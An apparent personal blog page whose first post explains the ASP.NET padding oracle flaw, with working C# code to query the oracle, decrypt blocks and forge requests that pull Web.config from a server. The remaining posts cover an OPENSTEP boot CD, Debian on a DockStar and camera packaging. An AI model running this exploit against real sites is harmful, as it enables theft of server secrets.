There have been several web postings citing the ASP.NET vulnerability, but few have tried to explain it.  Here's my attempt to simplify it for you, dear reader, complete with C# code to perform the exploit against a padding oracle.  There are two kinds of attacks that I'll be describing – the easier one is a decrypting attack, where the plaintext for encrypted data is obtained, and the more difficult one is an encrypting attack, where a forged encrypted request is sent.

None of the information I present here is secret, and all the steps can be obtained by thoroughly understanding the public documents describing how an exploit is performed.  None of the documents I’ve read specifically exploits ASP.NET, but coupled with knowledge on how ASP.NET works (Reflector helps a lot), an exploit program can easily be crafted.  The first and second documents are practically the same.  The third document describes the attack in more practical terms.

Contrary to what's implied in several blog posts, none of the papers successfully describe an encryption attack on ASP.NET.  Rizzo's paper offers hints at how an encryption attack can be performed (it's not easy), but given enough time and HTTP requests by the attacker, it can be done.  I'll describe the special case where the attacker can download any file from certain ASP.NET web sites using an encryption attack.  Update 10/13/2010: The PadBuster application in the third site above has been updated to use an encryption attack.

There are two padding oracles that I'm aware of in ASP.NET; there may be more.  The first oracle is the WebResource.axd handler.  It throws an HTTP 500 error if a padding error is encountered and either HTTP 200 or HTTP 404 if there isn't a padding error.  The other one is ViewState decryption, but I did not investigate the second one further, and most sites do not encrypt view state – that is, they just don't place sensitive information in the view state and avoid the encryption/decryption.  Contrary to what's been mentioned around the net, the ScriptResource.axd handler is not a padding oracle.  The code for ScriptResource catches a padding error and returns an HTTP 404 in its place.  The ScriptResource handler, however, is what's exploited in attempting to download any file from the web site.

The first fix has to be on the WebResource handler, to make it behave the same way as the ScriptResource handler (that is, catching the padding exception and returning an HTTP 404).  The processing code for ViewState may need to be fixed as well (like I mentioned, I didn’t explore the ViewState attack vector).  I will also make the assumption that the encrypting method is known (and the attacker knows what the cipher block size is).  This is typically 3DES or AES, but it’s just an additional step to check if the attack works for one or the other.

Finding The WebResource Padding Oracle.

The first step is to find an existing ciphertext for a request to the WebResource handler.  Inspection of the generated HTML page from an ASP.NET application easily turns this up.  Even the simplest ASP.NET application will include a WebResource request for the embedded "WebForms.js" resource.  The decrypted form of that request parameter is "s|WebForms.js".  It doesn't have to be that specific request – any WebResource request will do, because we know that it's a valid request to the ASP.NET application.
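
To make the later steps concrete, here is a rough sketch of querying the oracle over HTTP.  It assumes the "d" parameter uses the URL-token encoding that ASP.NET itself uses (HttpServerUtility.UrlTokenEncode), and it treats anything other than HTTP 500 as "no padding error":

using System.Net;
using System.Web;

public static class WebResourceOracle
{
    // Returns true when the server does NOT report a padding error:
    // HTTP 200 or 404 means the forged ciphertext decrypted with valid padding.
    public static bool PaddingAccepted(string baseUrl, byte[] cipherBytes)
    {
        string url = baseUrl + "/WebResource.axd?d=" + HttpServerUtility.UrlTokenEncode(cipherBytes);
        var request = (HttpWebRequest)WebRequest.Create(url);
        try
        {
            using (request.GetResponse())
            {
                return true;   // HTTP 200: no padding error
            }
        }
        catch (WebException ex)
        {
            var response = ex.Response as HttpWebResponse;
            // HTTP 404 also means valid padding (the decrypted resource name
            // simply doesn't exist); only HTTP 500 indicates a padding error.
            return response != null && response.StatusCode != HttpStatusCode.InternalServerError;
        }
    }
}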

Performing The Decryption Attack.

With a known valid ciphertext, we use that ciphertext as the prefix blocks for a padding oracle exploit.  I won't go into detail on the mathematical aspects of this (it's all described in the papers).  Suffice it to say that we perform a padding oracle decryption attack by sending several requests of the form "known ciphertext" + "garbled block" + "ciphertext block" to the server.  Decrypting a single ciphertext block will take at most n*256 requests, where n is the number of bytes in a block.  For 3DES-based encryption, that's a small 2000 requests per block.
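
A sketch of the per-block decryption step follows.  The oracle delegate stands in for the HTTP round trip above (prefix blocks and request encoding are omitted), and the block size is 8 for 3DES or 16 for AES:

using System;

public static class PaddingOracleDecryptor
{
    // prevBlock: the real ciphertext block (or IV) that precedes targetBlock.
    // oracle(forgedPrev, target): true when the server reports no padding error.
    public static byte[] DecryptBlock(byte[] prevBlock, byte[] targetBlock,
                                      Func<byte[], byte[], bool> oracle, int blockSize)
    {
        var intermediate = new byte[blockSize];   // D(targetBlock)
        var forged = new byte[blockSize];         // fake "previous" block we control

        for (int i = blockSize - 1; i >= 0; i--)
        {
            int pad = blockSize - i;              // padding value we want to produce

            // Set the already-recovered tail bytes so they decrypt to 'pad'.
            for (int j = i + 1; j < blockSize; j++)
                forged[j] = (byte)(intermediate[j] ^ pad);

            // Brute-force the byte at position i: at most 256 oracle calls.
            for (int guess = 0; guess < 256; guess++)
            {
                forged[i] = (byte)guess;
                if (oracle(forged, targetBlock))  // padding accepted
                {
                    intermediate[i] = (byte)(guess ^ pad);
                    break;
                }
                // Note: for pad == 1 a false positive is possible; a real
                // implementation re-checks by altering forged[i - 1] and
                // querying the oracle once more.
            }
        }

        // Plaintext of the block is D(targetBlock) XOR the real previous block.
        var plaintext = new byte[blockSize];
        for (int k = 0; k < blockSize; k++)
            plaintext[k] = (byte)(intermediate[k] ^ prevBlock[k]);
        return plaintext;
    }
}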

Performing The Encryption Attack.

The papers and the "padBuster" utility available for download around the net assume that the initialization vector (IV) is controllable by the attacker.  That may be true on some systems, but it is not the case for the other ASP.NET flaw described next.

There is a big vulnerability in one of the HTTP handlers that came out with ASP.NET 3.5.  Specifically, the ScriptResource.axd handler allows the download of any file within your application directory, but only if an attacker can craft a correctly encrypted download request.  Assuming for a moment that the attacker knows the encryption key, what would the plaintext look like?  A plaintext request for a file in the application directory looks like one of these:

r|~/Web.config

R|~/Web.config

Q|~/Web.config

q|~/Web.config

The different prefixes indicate different variations of the request (whether the downloaded stream should be gzip’ed and such).  The path could also be an absolute path instead of an application-relative path.

If the attacker does not have the encryption key, and the IV is the prefix of a request to ScriptResource, then it's easy for an attacker to craft such a request by first performing a decrypting padding oracle attack for the last block of the request against an existing ciphertext block.  Given the intermediate bytes for the last block, the ciphertext block for the second-to-last block is derived, and another decrypting attack is made on it.  The chain is followed until the first block, where the IV is derived and then sent as the prefix.  This would only involve about 4000 requests to the padding oracle, since the length of the desired attack request is only two 3DES blocks (or one AES block).

That’s only if the IV were sent as the prefix to the encrypted block.  It isn’t.  Not for the ScriptResource handler.

However, there's this other flaw.  If the victim web site makes a certain use of the ScriptResource handler, the source of the HTML page will have an (encrypted) request that is similar to one of the attack requests.  This happens with the use of CompositeScripts in the ScriptManager.  With CompositeScripts containing a script reference to a JavaScript file, the encrypted request starts with "Q|…".  If the attacker can find out that CompositeScripts are used in a page (by using the padding oracle to decrypt the first block of a ScriptResource request and checking if it starts with "Q|"), then that request can be used as a prefix to an attack request.

Specifically, the attack request will be composed of: “prefix” + “garbled block” + “||~/Web.config”.

Because of how the ScriptResource handler processes the request, the garbled block is ignored and the subsequent part of the request, the file download, is honored.  This causes the contents of the requested file to be appended to the rest of the results.

If the attacker cannot find an existing ScriptResource usage that has the "Q|" prefix, then it comes down to being able to craft a ciphertext block that corresponds to a 2-character prefix of "r#", "R#", "Q#", or "q#".  This is not trivial, but it still boils down to only having to forge a single block.  Because of the nature of block cryptography, a block with the correct prefix could be forged in about 256*256/4 (~16000) attempts.  Once that single block is forged, it can be used as the prefix to the attack request, where there is still a garbled block in the middle and a file download at the tail end of the attack.  The attack request will be composed of: "prefix" + "garbled block" + "|||~/Web.config".

16000 HTTP requests.  8000 requests on average.  It’s not a big number and can be done in a matter of minutes.

The provided code has more inline comments on it.  The constants in the code should be substituted with what’s obtained from visual inspection of the generated HTML file for a page.

//peterwong.net/files/PaddingOracleExploit.zip


Creating an OPENSTEP Boot CD

How OPENSTEP 4.2 boots in m68k hardware.

A NEXTSTEP/OPENSTEP CD cannot be made to boot in both sparc and m68k hardware.  With NEXTSTEP 3.3, there was one installation CD for m68k/i386 and another installation CD for sparc/hppa.  For sparc, the hardware expects the bootloader to start at offset 0x00000200 (512) of the CD.  For m68k, the hardware expects a disklabel at the very start of the CD, and the disklabel contains a pointer to the bootloader somewhere else in the CD.  A disklabel is 7240 bytes in size and cannot fit into the available first 512 bytes of a sparc-bootable CD.

With OPENSTEP 4.2, there was a single "User" installation CD for m68k/i386/sparc (I think they dropped support for the hppa platform at that time).  Given those three platforms, NeXT probably opted to make the CD bootable on sparc hardware.  The sparc magic number 01 03 01 07 is present at offset 0x00000200 of the CD.  Note that to boot from a CD, sparc workstations need SCSI CDROM drives that provide 512-byte sectors, instead of the more common 2048-byte sectors.  Older drives from Plextor, Yamaha, and Pioneer typically have a jumper that sets the sector size.  Trying to boot the CD from m68k hardware gives the following error:

  Bad version 0x80000000
  Bad cksum
  Bad version 0x0
  Bad cksum
  Bad label

An m68k/i386 installation diskette and an i386 driver diskette were provided in 3.5" 1.44MB format.  The installation diskette is used to bootstrap the installation into m68k hardware.  I could not find an m68k bootloader anywhere in the installation diskette, which leads me to think that the boot process probably traps into the m68k ROM, which then loads a copy of the disklabel from either offset 0x00002000 or offset 0x00003C00 of the CD.  From the disklabel, the m68k bootloader can be located in the CD and the boot process continues, loading the m68k kernel "sdmach".

How OPENSTEP 4.2 boots in i386 hardware.

An i386 ROM loads the i386 initial "B1" bootloader from the first 512 bytes of the diskette.  The initial bootloader loads the standard i386 bootloader from offset 0x00008000 of the diskette.  In the boot process, the i386 kernel "mach_kernel" is loaded, "sarld" is loaded, the user is prompted to insert the driver diskette, drivers are loaded (the driver for the IDE or SCSI CD drive needs to be loaded so the CD can be read), and installation copies files from the CD into the hard disk.

Creating an m68k-bootable "User" OPENSTEP CD.

Since m68k hardware looks for a disklabel at the start of the CD, we need only to copy the duplicate disklabel located at offset 0x00002000 or offset 0x00003C00 of the CD.  From a raw "ISO" image of the OPENSTEP 4.2 CD, the disklabel can be extracted with:

  dd bs=1 count=7680 if=OPENSTEP42CD.iso of=OPENSTEP42CD.lbl skip=8192

Overlay the extracted disklabel into the first part of the CD image:

  dd bs=1 count=7680 conv=notrunc if=OPENSTEP42CD.lbl of=OPENSTEP42CD.iso

Several bytes in the disklabel need to be changed.  The structure of the disklabel is available at bootblock.h.  The first set that needs to be changed is the block number in the disklabel.  If the disklabel originally came from offset 0x00002000, then its block number is 4 (where a block is 2048 bytes).  The new disklabel at the start of the disk should be at block number 0.

The second set of bytes that need to be changed is the pointer to the boot blocks (bootloader).  There are two pointers in the disklabel.  The first points to an hppa bootloader (block 0x10), and the second points to an m68k bootloader (block 0x30).  The hppa bootloader surprised me because I thought hppa platform support had been dropped in OPENSTEP.  Also note that the sparc bootloader that started at offset 0x00000200 has been partially overlaid by the new disklabel, so the new CD image will not be sparc-bootable.  We change the boot block pointers in the disklabel to point only to the m68k boot blocks — the first pointer is set to 0x30, and the second pointer is set to 0xFFFFFFFF.

The third set of bytes that need to be changed is the default kernel loaded by the bootloader.  From the original disklabel, the kernel name is "mach_kernel".  Although "mach_kernel" is present on the CD, it is a tri-fat binary.  The m68k bootloader cannot load the tri-fat binary, and instead needs to load the Mach-O binary "sdmach".  Although you can manually specify the kernel name on the ROM boot prompt, the disklabel is altered to use "sdmach" instead of "mach_kernel" as the default.

The last set of bytes that need to be changed is a checksum on the disklabel.  NS_CKSUM.C is a very short program that illustrates the checksum calculation.  It reads the bytes in the disklabel preceding the checksum itself, and outputs a 16-bit hexadecimal value to use as the new checksum.  With the updated OPENSTEP 4.2 CD disklabel, the checksum calculated is 0xCE22.

Creating an i386-bootable "User" OPENSTEP CD.

The i386 bootloader is located on the install diskette boot blocks.  This is a copy of the /usr/standalone/i386/boot binary located on the CD.  Additionally, the first 512 bytes of the diskette contains a copy of the /usr/standalone/i386/boot1f binary.  Unlike m68k hardware, i386 hardware does not bootstrap from the first few blocks of the CD.  Instead, i386 hardware makes use of the El Torito specification for bootstrapping from a CD.  The El Torito specification was developed by Phoenix and IBM.  With an El Torito CD, a bootstrap image is loaded by the BIOS.  The bootstrap image can be treated as a diskette in drive "A:".

One limitation in El Torito is that you can only bootstrap a single image.  Although it allows you to select from multiple bootstrap images on the CD, you only bootstrap one of the images ("B:" cannot be mapped to another image in the CD).  You also cannot "swap" images during the El Torito boot process, as required by the OPENSTEP i386 installation process where it asks that you eject the install diskette and insert the driver diskette.

With "mach_kernel" and "sarld", no additional drivers can fit in a 1.44MB install diskette.  The good thing in El Torito is that the bootstrap image can be the image of a 2.88MB diskette.  If we can combine the OPENSTEP install diskette and driver diskette into a single 2.88MB diskette, it can be used to boot from the CD.

There are several ways to create the 2.88MB diskette.  One way is to use an actual 2.88MB SCSI diskette drive and initialize a 2.88MB diskette appropriately, then copy the contents of both OPENSTEP diskettes into the new diskette.  Since I was currently working on a Windows box, I opted to use a virtual machine running OPENSTEP to set up the diskette image.

First, create a 2.88MB file (2,949,120 bytes).  You can use any available utility to create a file of that exact size.  The contents do not matter, since it will be re-initialized from within OPENSTEP.  I tried to mount the 2.88MB file as a virtual floppy drive in VirtualBox.  However, when treated as a floppy drive, the OPENSTEP i386 floppy driver refuses to initialize it as 2.88MB, citing that 1.44MB is the limit.  VirtualBox does not provide a BIOS configuration screen where you can change "A:" into a 2.88MB drive.  Virtual PC 2007 has the BIOS configuration screen, but as reported by others, OPENSTEP installation causes a processor exception in Virtual PC 2007.

The 2.88MB file is mounted as a virtual IDE disk in VirtualBox.  The VMware-format F288.vmdk file is used to describe the virtual disk F288.img as having 160 cylinders, 2 heads, and 18 sectors/track.  IDE sectors are 512 bytes in length, giving a total of 160*2*18*512 = 2.88MB.

Once assigned in VirtualBox running OPENSTEP, the 2.88MB disk is initialized as:

  /usr/etc/disk -i -b -B1 /usr/standalone/i386/boot1f /dev/rhd1a 

The new disk is mounted:

  mkdir /F288 
  mount /dev/hd1a /F288 

And files copied from the install diskette and driver diskettes:

  cp -r /4.2mach_Install/* /F288 
  cp -r /4.2mach_Drivers/* /F288 

Not all the drivers will fit, so some of them should not be copied.  I opted to not copy most of the SCSI drivers, since I will be installing from an IDE/ATAPI CD drive.  The /F288/private/Drivers/i386/System.config/Instance0.table is edited so "Prompt For Driver Disk" is "No".  We now have a 2.88MB "F288.img" file that can be used as the El Torito bootstrap image.

How do we combine the OPENSTEP 4.2 CD and the 2.88MB bootstrap image into a single El Torito ISO9660 CD?  The OPENSTEP 4.2 CD is not in ISO9660 format.  It is in a variant of the 4.3BSD UFS format.  What's great about this format is that the UFS filesystem sits at a "relative" location on the CD.  In bootblock.h, the disklabel specifies the size (in blocks) of the "front porch" that precedes the actual UFS filesystem and contains disk housekeeping information.  The raw UFS filesystem can be extracted from the CD image with:

  dd bs=2048 if=OPENSTEP42CD.iso of=OPENSTEP42CD.ufs skip=80

Having "F288.img" and "OPENSTEP42CD.ufs", we fire up our disk-burning application to create an El Toriro CD image.  The ISO9660 filesystem contains only the single OPENSTEP42CD.ufs file.  With the CD image created, we can find that the UFS filesystem got stored starting at offset 0x00360000.

We need to put the same block 0 disklabel into the CD image, but several bytes need to be changed.  The first set of bytes that need to be changed is the size of the "front porch".  Since the UFS filesystem has been moved to offset 0x00360000, the "front porch" value should be 0x06C0 (1728 blocks).  The other set of bytes that need to be changed is the checksum on the disklabel.  With this updated disklabel, the checksum calculated is 0xD492.

The disklabel is again overlaid onto the start of the CD image:

  dd bs=1 count=7680 conv=notrunc if=OPENSTEP42CD.Block00.ElTorito.lbl of=Disc.iso

Creating an m68k-bootable and i386-bootable OPENSTEP CD.

Extending the concepts further, we can create a CD that is bootable in both m68k and i386 hardware.  The ISO9660 volume descriptors start at offset 0x00008000 (block 16), and 32KB is not enough to fit a disklabel and an m68k bootloader; the /usr/standalone/boot.cdrom file alone is 49812 bytes in size.

For this El Torito CD image, the ISO9660 file system contains the two files boot.cdrom and OPENSTEP42CD.ufs, along with the 2.88MB bootstrap image.  A few changes are in order for the disklabel.  The UFS file system now starts at offset 0x0036C800 of the CD, so the "front porch" value should be 0x06D9 (1753 blocks).  The boot.cdrom image starts at offset 0x0036C000 of the CD.  The first boot block pointer should be 0x06C0, and the second boot block pointer is left as 0xFFFFFFFF.  The new checksum of the disklabel is 0xDB3B.

The disklabel is again overlaid onto the start of the CD image (again with conv=notrunc so Disc.iso is not truncated):

  dd bs=1 count=7680 conv=notrunc if=OPENSTEP42CD.Block00.ElTorito.m68k.lbl of=Disc.iso

With those changes to Disc.iso, the image can be burned to a CD that boots on both m68k platforms (as long as you have the latest ROM, which allows booting from CD) and i386 platforms.

Miscellaneous files for download.
Posted in Retrocomputing | 11 Comments

Debian on a Seagate DockStar

I bought a Seagate DockStar a couple of months ago.  What attracted me to this device was its size, its low price (compared to other Plug Computers), and its support for a standard Debian Linux distribution.  I would have preferred something I could install Ubuntu on, but Ubuntu does not support the ARMv5 architecture.  I'm okay with Debian, though, and Debian provides packages for this "armel" device even in its "squeeze" testing release.

SeagateFreeAgentDockStar-2

The DockStar has 128MB of RAM and 256MB of flash memory.  It has 4 USB ports, and unlike other Plug Computers, the ports are powered, so you can attach regular USB thumb drives as well as higher-capacity portable drives.  From the factory, the NAND flash memory is divided into four partitions.  The first partition, mtd0 (1 MB), contains a very old U-Boot bootloader.  The second partition, mtd1 (4 MB), contains a Linux kernel image, and the third partition, mtd2 (32 MB), contains a Linux jffs2 file system.  The remaining partition, mtd3 (219 MB), is unused.

Hacking the DockStar to boot a different Linux system from a USB drive all stemmed from the instructions initially posted at http://ahsoftware.de/dockstar/.  In essence, the bootloader environment variables are changed to cause the mtd0 bootloader to chain to another bootloader that gets installed at mtd3.  The installed mtd3 bootloader can then check for USB drives and boot the Linux kernel from there.

To accommodate a fallback to the original Pogoplug environment in case the USB drive fails to boot, a "switching" approach was applied to the bootloader environment variables: on each boot, the variables are toggled between booting the mtd1 kernel and booting a kernel from the USB drive.  However, the bootloader environment variables are themselves stored in mtd0, so this switching approach can potentially brick your device (if something goes wrong during the update to mtd0).  Because of technical limitations, the chained bootloader installed in mtd3 cannot fall back to the mtd1 kernel when it fails to boot from the USB drive.  Some users have therefore opted to configure the boot sequence so that it always tries the USB drive and never changes the bootloader variables in mtd0; if the USB boot fails, the drive can simply be mounted on another machine and fixed.

Although everyone agreed that mtd0 should not be rewritten on every boot, there was some debate over whether the old U-Boot bootloader in mtd0 should simply be updated outright.  Writing to the mtd0 U-Boot has its risks, but mtd0 gets rewritten on every boot anyway if the switching mechanism is used, so a one-time update to mtd0 sounds more reasonable.  It also frees up mtd3 for other things, like maybe a very small 219 MB Linux installation.

Step 1.  Prevent the DockStar from “phoning home”.

Out of the box, if you connect the DockStar to your network, it will retrieve firmware updates and disable ssh on the device.  To prevent this, I disconnected my home router from the Internet but left it responding to DHCP requests.  Most routers have a status page in their web interface that lists the IP addresses they have handed out, so you can determine which address the DockStar received via DHCP.  Knowing that, you can ssh into the DockStar with the default password, comment out the script command that runs the Pogoplug software (which is what retrieves the firmware update from the Internet), and save the change back into flash memory.  This is documented at http://ahsoftware.de/dockstar/.  Some have suggested that it is better to add a command that kills the offending process instead, so that the other kernel modules the script loads still get loaded.  But I do not trust any executable in the cloudengines directory not to "phone home", so I'm fine with disabling the whole script.
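
The exact script name varies between firmware revisions, so treat the following as a rough sketch: it assumes the stock root filesystem is mounted read-only and that the Pogoplug software is started from /etc/init.d/rcS.

    mount -o remount,rw /     # make the flash root writable
    vi /etc/init.d/rcS        # comment out the line that starts the Pogoplug software
    mount -o remount,ro /     # put the root back to read-only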

Step 2.  Update the mtd0 U-Boot and environment variables.

Jeff Doozan has been active on making this easy; great instructions are posted at http://jeff.doozan.com/debian/uboot/ and have since been adopted at http://www.plugapps.com/index.php5?title=PlugApps:Pogoplug_Setboot

Step 3.  Install the Debian “squeeze” release into a USB drive.

I opted to cross-install Debian’s armel distribution using debootstrap.  Since I was working from an Ubuntu desktop machine, my USB drive was at /dev/sdb.  I made three partitions (one 1GB ext3 partition, one 1GB swap partition, and another ext3 partition) and used the following to create the file systems:

    sudo mkfs -t ext3 /dev/sdb1
    sudo mkswap /dev/sdb2
    sudo mkfs -t ext3 /dev/sdb3

I installed debootstrap on the desktop and ran it against the first partition of the USB drive.  I opted to include the ntp package (because the DockStar does not have a battery-backed RTC), the USB automounter, the ssh server, the U-Boot image utilities, and the Linux kernel at this time.  Other packages can be installed later, once we get the DockStar to boot from the USB drive.

    sudo apt-get install debootstrap
    sudo mount /dev/sdb1 /mnt
    sudo /usr/sbin/debootstrap --foreign --arch=armel \
        --include=ntp,usbmount,openssh-server,uboot-mkimage,linux-image-2.6.32-5-kirkwood \
        squeeze /mnt http://ftp.us.debian.org/debian
    sudo umount /mnt

Detach the USB drive from the desktop and attach it to the DockStar.  The DockStar will still boot into the Pogoplug environment, since there isn't yet a valid U-Boot kernel image on the USB drive.  After ssh'ing into the DockStar:

    mount /dev/sda1 /mnt
    /usr/sbin/chroot /mnt /bin/bash
    PATH=/usr/sbin:/sbin:$PATH
    mount -t proc none /proc
    /debootstrap/debootstrap --second-stage

Although some prebuilt kernels are available at http://sheeva.with-linux.com/sheeva/, I opted to use the standard kernel from Debian:

    mkimage -A arm -O linux -T kernel -C none -a 0x8000 -e 0x8000 \
        -n "vmlinuz-2.6.32-5-kirkwood" -d /vmlinuz /boot/uImage
    mkimage -A arm -O linux -T ramdisk -C gzip -a 0 -e 0 \
        -n "initrd.img-2.6.32-5-kirkwood" -d /initrd.img /boot/uInitrd

I then performed some housekeeping before rebooting the DockStar:

    echo "dockstar" > /etc/hostname
    echo "LANG=C" > /etc/default/locale
    echo "/dev/sda1 / ext3 defaults 0 1" >> /etc/fstab
    echo "/dev/sda2 none swap sw 0 0" >> /etc/fstab
    echo "none /proc proc defaults 0 0" >> /etc/fstab
    echo "auto lo" >> /etc/network/interfaces
    echo "iface lo inet loopback" >> /etc/network/interfaces
    echo "auto eth0" >> /etc/network/interfaces
    echo "iface eth0 inet dhcp" >> /etc/network/interfaces
    echo "deb http://ftp.us.debian.org/debian squeeze main" >> /etc/apt/sources.list
    echo "deb-src http://ftp.us.debian.org/debian squeeze main" >> /etc/apt/sources.list
    echo "America/Los_Angeles" > /etc/timezone
    cp /usr/share/zoneinfo/America/Los_Angeles /etc/localtime
    passwd root

I then exited back to the Pogoplug-based environment and unmounted the USB drive:

    exit
    umount /mnt

Step 4.  Boot into the Debian system.

Once the Debian system is set up on the USB drive, you can issue a standard /sbin/reboot.  The updated bootloader will see the kernel image on the USB drive and boot the Debian system we have just installed.  From another machine, you can then ssh into the DockStar and install additional packages, for example:

    apt-get install apache2
    apt-get install dpkg-dev
    apt-get install netatalk    

And there you have it: a full Debian "squeeze" installation on an "armel" device.  With Apache, it becomes a full-fledged headless web server.  And with the USB ports, it's very convenient to transfer files onto the system using USB thumb drives and make them available throughout your network.

 

Update 10/30/2010: Corrected pre-formatted text and added additional housekeeping commands.

Posted in Computers | Tagged , | 15 Comments

The Shrinking Digital Camera Packaging

Have you noticed how consumer packaging for certain electronics has shrunk over the years?  I'm amazed at how that's happened with digital cameras.  My oldest digital camera was an Apple QuickTake 100, one of the earliest consumer digital cameras (it stored a whopping 8 pictures at 640×480, or 32 at the smaller 320×240).  Its box was about the size of a netbook box today: roughly a couple of reams of paper stacked on top of each other.

Apple QuickTake 100-1

As I went through several digital cameras over the years, the packaging became significantly smaller.  I've had a Minolta, a Kodak, and a Nikon digital camera, all packaged in boxes of about the same size.  Judith needed a new point-and-shoot camera to quickly catch pictures of the family during events, without having to lug around our digital SLR.  We ended up getting a Panasonic HF-20, and its packaging was barely the size of a few stacked CD jewel cases: just enough for the camera, some accessories, cables, a CD, and a thin "getting-started" booklet.  Just amazing!

IMG_8071

Posted in Around the House | Tagged | Leave a comment